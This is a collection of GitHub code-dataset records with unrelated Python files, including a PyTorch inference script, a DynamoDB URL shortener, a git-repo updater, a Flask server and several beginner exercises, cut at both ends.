generate_warnings=self.warn)\n\n results = cursor.results()\n warnings = cursor.warnings()\n fields = cursor.fields() or []\n elapsed = round(1000 * (time.time() - start))\n if self.warn and warnings is not None:\n self.wprint(warnings)\n if 'drop_results' in self.args:\n print(\n 'Query returned {} rows in {}ms'.format(len(results), elapsed)\n )\n else:\n self.print_list(0, results, field_order=[f['name'] for f in fields])\n\n return 0\n","repo_name":"gadhagod/rockset-python","sub_path":"rockset/rock/commands/sqlquery.py","file_name":"sqlquery.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24641602430","text":"\n\"\"\"\nyil = 2022\ntoplam = 0\nwhile True:\n yillikGelir = int(input(f\"{yil} yılı geliriniz?\"))\n yil += 1\n if yillikGelir == 0:\n print(\"bb\")\n break\n if yillikGelir < 32000:\n vergiOrani = 0.15\n elif yillikGelir >= 32000 or yillikGelir < 70000:\n vergiOrani = 0.20\n elif yillikGelir >= 70000 or yillikGelir < 250000:\n vergiOrani = 0.27\n elif yillikGelir >= 250000 or yillikGelir < 880000:\n vergiOrani = 0.35\n else:\n vergiOrani = 0.40\n if yil == 2027:\n break\n # print(f\"Verginiz {yillikGelir*vergiOrani} TL'dir.\")\n toplam += (yillikGelir*vergiOrani)\nprint(f\"5 yıllık ödediğiniz gelirler vergisi toplamınız {toplam} TL'dir. 
\")\n\n\"\"\"\n\n#Vücüt kitle indeksi\n#vki = kg/m*m\nwhile True:\n kilo= float(input(\"Lütfen kilonuzu giriniz \\t:\"))\n boy=float(input(\"Lütfen boyunuzu giriniz \\t: \"))\n vci = kilo / ( boy**2 )\n\n if vci <18.5:\n print(\"vücüt kitle indeksi zayıf\")\n elif vci>18.5 and vci<24.9:\n print(\"ideal\")\n elif vci >25 and vci<29.9:\n print(\"şişman\") \n elif vci>34.9 and vci<30:\n print(\"obez\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Mert173-code/VSCode-Python","sub_path":"03_donguler.py/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19473846309","text":"from torch.utils.data import Dataset, DataLoader\nimport torch\nimport glob\nimport os\nimport numpy as np\nimport cv2\nfrom multiprocessing import Pool, Manager, Process\nimport torchvision.transforms as transforms\nimport argparse\nimport segmentation_models_pytorch as smp\nimport torch.cuda.amp as amp\nimport torch.nn as nn\nimport time\nimport matplotlib.pyplot as plt\n########\nfinal_start_time = time.time()\n########\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nis_print = True\npatch_size = 768\noverlap_ratio = 0.5\nmax_y = 7\nmax_x = 9\nmanager = Manager()\n# data_dict = manager.dict()\n\ndef crop_image(filename):\n overlap = 0.5\n dict = {}\n flag = False\n for origin_filename in filename:\n origin_image = cv2.imread(origin_filename)\n filename_only = origin_filename.split(\"/\")[-1].split(\".\")[0]\n x_list = [i for i in range(0, len(origin_image[0]), int(patch_size * (1 - overlap)))]\n y_list = [i for i in range(0, len(origin_image), int(patch_size * (1 - overlap)))]\n for idx_x, x in enumerate(x_list):\n for idx_y, y in enumerate(y_list):\n patch_image = origin_image[y:y+patch_size, x:x+patch_size, :]\n if patch_image.shape != (patch_size, patch_size, 3):\n h, w, c = patch_image.shape\n if not flag:\n zeros = np.zeros((patch_size, patch_size, 3), dtype=np.uint8)\n flag = True\n else:\n zeros[:,:,:] = 0\n zeros[:h, :w, :] = patch_image\n patch_image = zeros.copy()\n dict[filename_only+\"_\"+str(idx_x)+\"_\"+str(idx_y)] = patch_image\n return dict\n\ndef save_image(save_folder, file_names, images):\n for filename, image in zip(file_names, images):\n cv2.imwrite(os.path.join(save_folder, filename), image[:,:,::-1])\n\n\nclass TestDataset(Dataset):\n def __init__(self, folder_path):\n data_paths = glob.glob(os.path.join(folder_path, \"*.png\"))\n dict_ = crop_image(data_paths)\n self.dictionary = dict(dict_)\n self.path_list = sorted(list(self.dictionary.keys()))\n self.transform = transforms.ToTensor()\n\n def __len__(self):\n return len(self.path_list)\n\n def __getitem__(self, index):\n ret_path = self.path_list[index]\n ret_img = self.dictionary[ret_path]\n\n y = int(ret_path.split(\"_\")[-1])\n x = int(ret_path.split(\"_\")[-2])\n image_name = \"_\".join(ret_path.split(\"_\")[:-2])\n return transforms.ToTensor()(ret_img[:,:,::-1].copy()), y, x, image_name\n\n\ndef main():\n '''Parsing arguments'''\n print(\"Inference Start..\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test_path\", type=str, default='./test_input_img')\n parser.add_argument(\"--save_path\", type=str, default='./best')\n parser.add_argument(\"--weight_path\", type=str, default=\"./weights_train/model_b3_full_pretrained_142(LB).pt\")\n args = parser.parse_args()\n\n 
os.makedirs(args.save_path, exist_ok=True)\n\n\n '''Prepare the dataset and loader'''\n db_start = time.time()\n test_dataset = TestDataset(args.test_path)\n test_loader = DataLoader(test_dataset, batch_size=21, shuffle=False, pin_memory=True, num_workers=4)\n print(\"Data Preprocessing...\", time.time()-db_start)\n '''Model Setting'''\n setup_start = time.time()\n model = smp.UnetPlusPlus(encoder_name='timm-efficientnet-b3', classes=3)\n model = nn.DataParallel(model, device_ids=[0])\n model.cuda()\n model.load_state_dict(torch.load(args.weight_path))\n\n print(\"Model Setup...\", time.time() - setup_start)\n condition = {}\n prediction_images = []\n prediction_paths = []\n model.eval()\n\n patch_making = 0\n output_patch = 0\n inference_only = 0\n sr_only = 0\n start_inf = time.time()\n with torch.no_grad():\n image = torch.zeros((3, 2448, 3264), dtype=torch.float32).cuda()\n for data in test_loader:\n input, y, x, image_name = data\n input = input.cuda()\n\n with amp.autocast():\n infer_start = time.time()\n model_prediction = model.forward(input)\n prediction = torch.clamp((input + model_prediction), 0., 1.)\n prediction = prediction * 255.0\n infer_end = time.time()\n inference_only += (infer_end - infer_start)\n\n\n for idx, (x_, y_, name) in enumerate(zip(x, y, image_name)):\n\n if name not in condition.keys():\n condition[name] = np.zeros((max_y, max_x))\n\n sss = time.time()\n overlap = int(patch_size * (1 - overlap_ratio))\n init_y = int(y_) * overlap\n if int(y_) * overlap < 2448 - patch_size:\n end_y = int(y_) * overlap + patch_size\n res_y = patch_size\n else:\n end_y = 2449\n res_y = 2448 - (int(y_) * overlap + patch_size)\n\n init_x = int(x_) * overlap\n if int(x_) * overlap < 3264 - patch_size:\n end_x = int(x_) * overlap + patch_size\n res_x = patch_size\n else:\n end_x = 3265\n res_x = 3264 - (int(x_) * overlap + patch_size)\n\n condition[name][int(y_)][int(x_)] = 1\n eee = time.time()\n patch_making += (eee - sss)\n image[:, init_y: end_y, init_x: end_x] += prediction[idx][:, :res_y, :res_x]\n\n\n if np.sum(condition[name]) == max_x * max_y:\n #to_save_image = to_save_image[:, :2448, :3264].permute(1, 2, 0).cpu().detach().numpy()\n start_sr = time.time()\n image[:, 384:, :] /= 2.\n image[:, :, 384:] /= 2.\n end_sr = time.time()\n sr_only += end_sr - start_sr\n save_name = str(name).replace(\"_input_\", \"_\") + \".png\"\n s = time.time()\n\n prediction_images.append(image.permute(1, 2, 0).byte().detach().cpu().numpy())\n prediction_paths.append(save_name)\n end = time.time()\n print('Inference time per image...', end - start_inf)\n image[:,:,:] = 0.\n e = time.time()\n output_patch += e - s\n\n save_start = time.time()\n sub_prediction_image = np.array_split(prediction_images, 8)\n sub_prediction_path = np.array_split(prediction_paths, 8)\n\n\n process_list = []\n\n for sub_img, sub_path in zip(sub_prediction_image, sub_prediction_path):\n proc = Process(target=save_image, args=(args.save_path, sub_path, sub_img,))\n process_list.append(proc)\n proc.start()\n\n for proc in process_list:\n proc.join()\n print(\"Data Save...\", time.time()-save_start)\n\n os.system('cd '+args.save_path+\" \"+'&& zip -1 ../submission_upl.zip '+\"./*.png\")\n print(\"Inference End\")\n\n ########\n final_end_time = time.time()\n ########\n print(\"Patch Making:\", patch_making)\n print(\"Type conversion:\", output_patch)\n print(\"Save - Reset:\", sr_only, 's')\n print(\"Model Inference Time:\", inference_only, 's')\n print(\"Inference Elapsed 
Time:\",final_end_time-final_start_time,\"s\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rlawjdghek/2021-LG-AI-Competition","sub_path":"src/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"75406336007","text":"#!/usr/bin/env python\n\nimport pdb, json, cv2, numpy as np\nfrom scipy.misc import imread\nfrom TensorBox.predict import TensorBox\n\n# Read in image (RGB format)\nimg = imread('data/liberia_sample_940.jpg')\n\n# Reconstruct the model, will automatically download weights\nmodel = TensorBox()\n\ndescription = json.load(open('weights/tensorbox/description.json'))\n\n# Infer buildings\nresult = model.predict_image(img)\nresult = result[result.score > description['threshold']]\n\norig = img.copy()\n\n# Plot the boxes on the original image\nfor box in result.values[:, :4].round().astype(int):\n cv2.rectangle(img, tuple(box[:2]), tuple(box[2:4]), (0,0,255))\n\nspace = np.zeros([orig.shape[0], 5, 3])\ncv2.imwrite('with_annotated_buildings.jpg', np.concatenate([orig, space, img], axis=1))","repo_name":"ArnholdInstitute/ColdSpots","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"72833409289","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Module to abstract away the database setup and access code.\"\"\"\n\nimport random\nimport string\nfrom typing import Dict, Optional\n\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\n\n\nclass DynamoTable(object):\n \"\"\"\n Class to simplify interaction with the configured DynamoDB.\n\n It abstracts away the necessary schema definition for a table that\n can hold a long url which is stored under a short key.\n\n \"\"\"\n\n def __init__(\n self,\n table_name: str = \"urls\",\n local: bool = False,\n ):\n \"\"\"\n Initialize a connected DynamoDB table.\n\n Arguments:\n table_name (str): (Optional) Name of the table on the Dynamo\n Database to connect to. If no name is provided `urls` is used\n by default.\n local (bool): Whether to use a local instance of DynamoDB. If True,\n the DynamoDB should be reachable at \"http://localhost:8000\".\n Default is False.\n\n \"\"\"\n self.table_name = table_name\n self.table = None\n\n endpoint_url = None\n if local:\n endpoint_url = \"http://localhost:8000\"\n\n self.dynamodb = boto3.resource(\n \"dynamodb\",\n region_name=\"us-west-1\",\n endpoint_url=endpoint_url,\n )\n\n self.KEY_SCHEMA = [\n {\n \"AttributeName\": \"short\",\n \"KeyType\": \"HASH\",\n },\n ]\n\n self.ATTRIBUTES_DEFINITIONS = [\n {\n \"AttributeName\": \"short\",\n \"AttributeType\": \"S\",\n },\n ]\n\n self.PROVISIONED_TRHOUGHPUT = {\n \"ReadCapacityUnits\": 10,\n \"WriteCapacityUnits\": 1,\n }\n\n if not self.table:\n self.conntect_table()\n\n def conntect_table(self):\n \"\"\"\n Connect to an existing table or create a new table by the name.\n\n Sets the classes `table` attribute to an active table with the given\n name. 
If no such table exists to connect to, a table is created.\n\n Raises:\n RuntimeError: Raised if existing of created table responds to a\n status check, but with a status different than \"ACTIVE\".\n\n \"\"\"\n table = self.dynamodb.Table(self.table_name)\n try:\n status = table.table_status\n except ClientError:\n table = self.create_table()\n status = table.table_status\n else:\n if status != \"ACTIVE\":\n raise RuntimeError\n self.table = table\n\n def create_table(self):\n \"\"\"\n Create table with the given name and the schema defined in the class.\n\n Returns:\n boto3.resource.Table: The created table object and does not set any\n attributes of the class.\n\n \"\"\"\n return self.dynamodb.create_table(\n TableName=self.table_name,\n KeySchema=self.KEY_SCHEMA,\n AttributeDefinitions=self.ATTRIBUTES_DEFINITIONS,\n ProvisionedThroughput=self.PROVISIONED_TRHOUGHPUT,\n )\n\n def save_long_url(self, long_url: str) -> Dict[str, str]:\n \"\"\"\n Save a given long URL under a randomly generated key in the DB.\n\n Arguments:\n long_url (str): URL which to save.\n\n Returns:\n dict: Contains the `short` key and `long` URL.\n\n Raises:\n RuntimeError: Raised if the DynamoDB table responds with a\n different HTTP status than 200.\n\n \"\"\"\n item = {\n \"long_url\": long_url.strip(),\n }\n # Check if long already in db\n item[\"short\"] = self.get_short_of_long(long_url)\n\n if item[\"short\"] is None:\n put_succsess = False\n while not put_succsess:\n item[\"short\"] = random_string()\n try:\n response = self.table.put_item(\n Item=item,\n ConditionExpression=Attr(\"short\").not_exists(),\n )\n except ClientError as e:\n if \"ConditionalCheckFailedException\" not in e.args[0]:\n raise e\n pass\n else:\n put_succsess = True\n\n if response[\"ResponseMetadata\"][\"HTTPStatusCode\"] != 200:\n raise RuntimeError\n return item\n\n def get_short_of_long(self, long_url: str) -> Optional[str]:\n \"\"\"\n Get short key for given long URL.\n\n Arguments:\n long_url (str): Long URL to lookup in the database and for which\n to return the short key.\n\n Returns:\n str: Short key for the given long URL.\n None: If no short key was found, `None` is returned\n\n \"\"\"\n response = self.table.scan(\n FilterExpression=Attr(\"long_url\").eq(long_url),\n )\n if response[\"Count\"] == 0:\n return None\n return response[\"Items\"][0].get(\"short\")\n\n def get_long_from_short(self, short: str) -> Optional[str]:\n \"\"\"\n Get long URL saved under a given `short` key.\n\n Arguments:\n short (str): Short key under which the long URL is saved.\n\n Returns:\n str: Long URL saved under the given short key.\n None: If no entry for the given short key can be found.\n\n \"\"\"\n response = self.table.query(\n KeyConditionExpression=Key(\"short\").eq(short),\n )\n if response[\"Count\"] == 0:\n return None\n item = response[\"Items\"][0]\n return item.get(\"long_url\")\n\n\ndef random_string(length: int = 4) -> str:\n \"\"\"\n Return a random string of given length.\n\n Arguments:\n length (int): (Optional) Length of the returned string. Default: 4.\n\n Returns:\n str: Random string of a given length. 
The string is composed of upper\n and lower case letters as well as digits 0-9.\n\n \"\"\"\n return \"\".join(\n random.choices(\n string.ascii_letters + string.digits,\n k=length,\n ),\n )\n","repo_name":"tbrlpld/short","sub_path":"short/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1921601602","text":"import subprocess\nimport os\nimport argparse\n\ndef get_latest_tag(repo_path):\n try:\n result = subprocess.run([\"git\", \"describe\", \"--tags\"], cwd=repo_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n return result.stdout.strip()\n except Exception as e:\n print(f\"Error getting tag: {str(e)}\")\n return None\n\ndef git_pull(repo_path):\n try:\n result = subprocess.run([\"git\", \"pull\"], cwd=repo_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n all_output = result.stdout + result.stderr\n if \"Already up to date.\" in all_output:\n return \"Already up to date.\"\n elif \"error:\" in all_output:\n error_msg = all_output.split(\"error:\")[1].strip()\n return f\"Error during update: {error_msg}\"\n elif \"fatal:\" in all_output:\n fatal_msg = all_output.split(\"fatal:\")[1].strip()\n return f\"Fatal error during update: {fatal_msg}\"\n elif \"Updating\" in all_output or \"Fast-forward\" in all_output:\n return \"Repository updated successfully.\"\n else:\n return \"Unrecognized status. Manual check recommended.\"\n except Exception as e:\n print(f\"Error during pull: {str(e)}\")\n return None\n\ndef find_git_repos(path):\n for root, dirs, files in os.walk(path):\n if \".git\" in dirs:\n yield root\n\ndef main(path):\n for repo in find_git_repos(path):\n print(f\"\\nChecking repository: {repo}\")\n current_version = get_latest_tag(repo)\n print(f\"Current Version: {current_version if current_version else 'Unknown'}\")\n \n pull_result = git_pull(repo)\n print(f\"Update Status: {pull_result}\")\n \n new_version = get_latest_tag(repo)\n if current_version != new_version:\n print(f\"Updated Version: {new_version if new_version else 'Unknown'}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Update Git repositories in a given path.')\n parser.add_argument('path', help='The path to check for repositories')\n\n args = parser.parse_args()\n \n if not os.path.exists(args.path):\n print(\"Provided path does not exist.\")\n else:\n main(args.path)\n","repo_name":"cristianb84/custom_made","sub_path":"update-stuff.py","file_name":"update-stuff.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70654488648","text":"import os\n\nfrom py4design import py3dmodel\nimport las_utils\n\nif __name__ == '__main__':\n #specify the pt cloud directory\n pt_cloud_dir = \"F:\\\\kianwee_work\\\\princeton\\\\2019_06_to_2019_12\\\\campus_as_a_lab\\\\model3d\\\\las2\"\n bdry_shp_file = \"F:\\\\kianwee_work\\\\princeton\\\\2019_06_to_2019_12\\\\campus_as_a_lab\\\\model3d\\\\shp\\\\las_bdry\\\\las_bdry.shp\"\n \n lasfiles = las_utils.get_lasfiles2(pt_cloud_dir)\n bdry_face_list = []\n \n for laspath in lasfiles:\n mn = las_utils.get_las_file_bdry(laspath)\n lasfilename = os.path.split(laspath)[-1].split('.')[-2]\n face = las_utils.make_bdry_face2d(mn)\n shpatt = shpfile_utils.shp2shpatt(face, {'lasfile':lasfilename})\n shpatt_list.append(shpatt)\n bdry_face_list.append(face)\n \n olist = []\n \n for cnt1,f in 
enumerate(bdry_face_list):\n bdry_list2 = bdry_face_list[:]\n area1 = py3dmodel.calculate.face_area(f)\n for cnt2,f2 in enumerate(bdry_list2):\n if cnt2 != cnt1:\n common = py3dmodel.construct.boolean_common(f, f2)\n is_null = py3dmodel.fetch.is_compound_null(common)\n if not is_null:\n common = py3dmodel.modify.move([0,0,0], [0,0,20], common)\n f2 = py3dmodel.modify.move([0,0,0], [0,0,10], f2)\n f3 = py3dmodel.fetch.topo_explorer(common, \"face\")\n if f3:\n area2 = py3dmodel.calculate.face_area(f3[0])\n if area2 >= area1:\n file1 = list_dir[cnt1]\n file2 = list_dir[cnt2]\n print(\"********************* Overlap file1\", file1)\n print(\"********************* Overlap file2\", file2)\n olist.append([])\n if file1 not in olist:\n olist[-1].append(list_dir[cnt1])\n if file2 not in olist:\n olist[-1].append(list_dir[cnt2])\n #py3dmodel.utility.visualise([[common], [f], [f2]], [\"RED\", \"GREEN\", \"BLUE\"])\n print(len(olist))\n for x in olist:\n print(x)","repo_name":"chenkianwee/py4design_examples","sub_path":"example_scripts/model_princeton3d/rmv_overlap_lidar.py","file_name":"rmv_overlap_lidar.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20941814191","text":"#!/usr/bin/python3\n# 12-pascal_triangle.py\n\"\"\"Defines a Pascal's Triangle function.\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"Represent Pascal's Triangle of size n.\n Returns a list of lists of integers representing the triangle.\n \"\"\"\n if n <= 0:\n return []\n\n result = [[1]]\n while len(result) != n:\n x = result[-1]\n tmp = [1]\n for i in range(len(x) - 1):\n tmp.append(x[i] + x[i + 1])\n tmp.append(1)\n result.append(tmp)\n return result\n","repo_name":"Buezman/alx-higher_level_programming","sub_path":"0x0B-python-input_output/12-pascal_triangle.py","file_name":"12-pascal_triangle.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37724603042","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom uncertainties import * \nfrom uncertainties import unumpy as u\nprint('')\n\n# Load data\nradii_data = np.loadtxt('rms13.dat',skiprows=2,usecols=[0,1,2,3,4])\n\n\n# Assign variables of each isotopes to lists and convert to arrays\n\nZ = []\nA = []\nN = []\nradii = []\nradii_error = []\n\nfor i in range(len(radii_data)):\n\tZ.append(int(radii_data[i,0]))\n\tN.append(int(radii_data[i,1]))\n\tA.append(int(radii_data[i,2]))\n\tradii.append(radii_data[i,3])\n\tradii_error.append(radii_data[1,4])\n\nZ = np.array(Z)\nA = np.array(A)\nN = np.array(N)\nradii = np.array(radii)\nradii_error = np.array(radii_error)\n\n# Order list in ascending Z\n\nZ_i = np.arange(Z.min(),Z.max()+0.1,1)\n\nZ_1 = []\nN_1 = []\nA_1 = []\nradii_1 = []\nradii_error_1 = []\n\nfor i in range(len(Z_i)):\n\tfor j in range(len(Z)):\n\t\tif Z[j] == Z_i[i]:\n\t\t\tN_1.append(N[j])\n\t\t\tZ_1.append(Z[j])\n\t\t\tA_1.append(A[j])\n\t\t\tradii_1.append(radii[j])\n\t\t\tradii_error_1.append(radii_error[j])\n\n# makes uncertainties uarray of radii and their errors\n\nradii_1 = u.uarray(radii_1,radii_error_1)\n\n# Calcualte rms(N) - rms(N-1) (checking that elements differ by only 1 neutron number)\n\nradiinn1 = []\nNnn1 = []\nZnn1 = []\n\nfor i in np.arange(1,len(Z_1)-1,1):\n\tif Z_1[i] == Z_1[i-1]:\n\t\tif N_1[i] == N_1[i-1] + 1:\n\t\t\tradiinn1.append(radii_1[i]-radii_1[i-1])\n\t\t\tNnn1.append(N_1[i])\n\t\t\tZnn1.append(Z_1[i])\n\nradiinn1 = 
np.array(radiinn1)\nNnn1 = np.array(Nnn1)\nZnn1 = np.array(Znn1)\n\n# Plot either with errorbars or without\n\n# plt.errorbar(Nnn1,u.nominal_values(radiinn1),yerr=u.std_devs(radiinn1),fmt='bo',markersize=0,label='All')\nplt.plot(Nnn1,u.nominal_values(radiinn1),'bo',label='All')\n\n# Plot mercury data in different colour\nNHg = Nnn1[Znn1==80]\nradiiHg = radiinn1[Znn1==80]\n# plt.errorbar(NHg,u.nominal_values(radiiHg),yerr=u.std_devs(radiiHg),fmt='ro',markersize=0,label='Hg')\nplt.plot(NHg,u.nominal_values(radiiHg),'ro',label='$_{80}$Hg')\n\n# Plot yttrium data in different colour\nNY = Nnn1[Znn1==39]\nradiiY = radiinn1[Znn1==39]\n# plt.errorbar(NBe,u.nominal_values(radiiBe),yerr=u.std_devs(radiiBe),fmt='go',markersize=0,label='Be')\nplt.plot(NY,u.nominal_values(radiiY),'go',label='$_{39}$Y')\n\nplt.xlabel('Neutron number')\nplt.ylabel(r'$\\delta \\sqrt{\\langle r^{2} \\rangle}^{N,N-1}}$ (fm)')\n\n# Plot with limits on y to show shell structure\nplt.ylim(-0.08,0.15)\nplt.savefig('rmsdata_zoom.pdf',bbox_inches='tight')\n\n# plt.savefig('rmsdata.pdf',bbox_inches='tight')\n\nplt.legend()\nplt.show()","repo_name":"tikrneva/Talent2017-Group6","sub_path":"Week 1/Exercises/rms_radii.py","file_name":"rms_radii.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71374689288","text":"from sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport graphviz\nimport pandas as pd\nfrom time import time\nfrom sklearn import preprocessing\n\ndef read_data(file='./data/credit_train.csv'):\n\traw_data = pd.read_csv(file)\n\traw_data = raw_data.drop(columns = ['Loan ID', 'Customer ID'])\n\tif 'Loan Status' in raw_data.columns:\n\t\traw_data = raw_data.drop(columns = ['Loan Status'])\n\tdata = dict()\n\tdict_data = dict(raw_data)\n\tle = preprocessing.LabelEncoder()\n\tfor column in dict_data:\n\t\ttransform_list = [str(x) for x in dict_data[column]]\n\t\tfit_list = transform_list\n\t\tle.fit(fit_list)\n\t\tdata[column] = le.transform(transform_list)\n\tdata = pd.DataFrame(data)\n\n\tfeature_names = list(data.columns)[:-1]\n\ty = [x for x in data['Bankruptcies']]\n\tX = data.drop(columns = ['Bankruptcies'])\n\treturn X, y, feature_names\n\nX, y, feature_names = read_data('./data/credit_train.csv')\nX_test, y_true, _ = read_data('./data/credit_test.csv')\n\nclf = tree.DecisionTreeClassifier()\nstart = time()\nclf = clf.fit(X, y)\nend = time()\n\n\ny_pred = clf.predict(X_test)\n\naccuracy = accuracy_score(y_true, y_pred)\nprint('Prediction: ', y_pred)\nprint('Accuracy: ' + str(accuracy))\n\ntree.plot_tree(clf)\n\ndot_data = tree.export_graphviz(clf, out_file=None,\n\tfeature_names=feature_names,\n\tfilled=True, rounded=True, special_characters=True)\ngraph = graphviz.Source(dot_data)\ngraph.render('./model/' + str(start) + '_accuracy_' + str(accuracy) + '_model')\n\ntrain = pd.DataFrame({**X, \"class\": y})\ntrain.to_csv('./log/' + str(start) + '_accuracy_' + str(accuracy) + '_train.csv', index=True)\n\nresult = pd.DataFrame({**X_test, \"true class\": y_true, \"predicted class\": y_pred})\nresult.to_csv('./log/' + str(start) + '_accuracy_' + str(accuracy) + '_test.csv', index=True)","repo_name":"DXV-HUST-SoICT/data_mining_mini_projects","sub_path":"decision tree/credit/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"39213426587","text":"# 로또의 최고 순위와 최저 순위 : https://programmers.co.kr/learn/courses/30/lessons/77484\n\ndef solution(lottos, win_nums):\n answer = [0,0]\n \n cnt=0\n zero_cnt=0\n \n for i, num in enumerate(win_nums):\n if num in lottos:\n cnt+=1\n if lottos[i]==0:\n zero_cnt+=1\n \n rank=[6,6,5,4,3,2,1]\n \n answer[0]=rank[zero_cnt+cnt]\n answer[1]=rank[cnt]\n return answer\n","repo_name":"LiveHonestLife/chaewon","sub_path":"Week4/lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8771734929","text":"import mongoengine\nimport os\n\nfrom flask import Flask, render_template, request\nfrom flask_login import LoginManager, current_user\nfrom flask_debugtoolbar import DebugToolbarExtension\n\nfrom ica.api.v1 import api\nfrom ica.views.website import website\nfrom ica.views.social import social\nfrom ica.views.management import management\nfrom ica.models.user import User\nfrom ica.cache import cache\nfrom ica.logger import client\nfrom ica.tasks import high_queue\n\n# Server settings\napp = Flask(__name__)\napp.config.from_object(os.getenv('CONFIG'))\n\n# Register apps\napp.register_blueprint(website)\napp.register_blueprint(social, url_prefix='/social')\napp.register_blueprint(management, url_prefix='/management')\napp.register_blueprint(api, url_prefix='/api/v1')\n\n# Database settings\ndb_auth = {\n 'db': app.config['DATABASE_NAME'],\n 'host': app.config['DATABASE_HOST'],\n 'username': app.config['DATABASE_USER'],\n 'password': app.config['DATABASE_PASSWORD']\n}\n\nmongoengine.connect(**db_auth)\n\n# Cache settings\ncache.init_app(app)\n\n# Debug toolbar settings\nDebugToolbarExtension(app)\n\n# Authentication settings\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'website.login'\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.objects(id=user_id).first()\n\n\n# Error handlers\n@app.errorhandler(404)\ndef page_not_found(error):\n header = 'Page Not Found'\n text = 'What you were looking for is just not there. ' + \\\n 'Go somewhere nicer.'\n\n \"\"\"\n if hasattr(current_user, 'id'):\n fname, lname = current_user.fname, current_user.lname\n msg = '404 ({}) from {} {}'.format(request.url, fname, lname)\n else:\n msg = '404 ({}) from Anonymous'.format(request.url)\n\n high_queue.enqueue(\n client.log_event,\n request.headers.get('X-Forwarded-For', request.remote_addr),\n '{} ({})'.format(msg, error)\n )\n \"\"\"\n\n return render_template('error.html', user=current_user,\n header=header, text=text), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n header = 'Internal Server Error'\n text = 'Looks like something went wrong on our end. We\\'ve ' + \\\n 'been notified and are currently working to fix it!'\n\n if hasattr(current_user, 'id'):\n fname, lname = current_user.fname, current_user.lname\n msg = '500 from {} {}'.format(fname, lname)\n else:\n msg = '500 from Anonymous'\n\n high_queue.enqueue(\n client.log_event,\n request.headers.get('X-Forwarded-For', request.remote_addr),\n '{} ({})'.format(msg, error)\n )\n\n return render_template('error.html', user=current_user,\n header=header, text=text), 500\n\n\n@app.errorhandler(413)\ndef request_entity_error(error):\n header = 'Request Entity Too Large'\n text = 'You tried to upload a file that was too large! 
We only' + \\\n ' support uploading photos under 500 KB, so please try again.'\n\n if hasattr(current_user, 'id'):\n fname, lname = current_user.fname, current_user.lname\n msg = '413 from {} {}'.format(fname, lname)\n else:\n msg = '413 from Anonymous'\n\n high_queue.enqueue(\n client.log_event,\n request.headers.get('X-Forwarded-For', request.remote_addr),\n '{} ({})'.format(msg, error)\n )\n\n return render_template('error.html', user=current_user,\n header=header, text=text), 500\n","repo_name":"texas-ica/texas-ica.com","sub_path":"ica/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"52094784886","text":"class Solution:\n def search(self, nums: List[int], target: int) -> int:\n \n pivot_index = -1\n \n def search_range(low, high, k_target):\n nonlocal pivot_index\n \n if low > high:\n return\n \n mid = low + (high-low)//2\n if k_target < nums[mid]:\n search_range(mid + 1, high, k_target)\n elif k_target > nums[mid]:\n pivot_index = mid\n search_range(low, mid-1, k_target)\n \n search_range(1, len(nums)-1, nums[0])\n \n def binary_search(low, high):\n \n if low > high:\n return -1\n mid = low + (high - low)//2\n\n if nums[mid]==target:\n return mid\n elif nums[mid] > target:\n return binary_search(low, mid-1)\n else:\n return binary_search(mid + 1, high)\n \n if pivot_index == -1:\n return binary_search(0, len(nums)-1)\n else:\n if nums[0] <= target:\n return binary_search(0, pivot_index -1)\n elif nums[-1] >= target or nums[pivot_index]==target:\n return binary_search(pivot_index, len(nums)-1)\n else:\n return 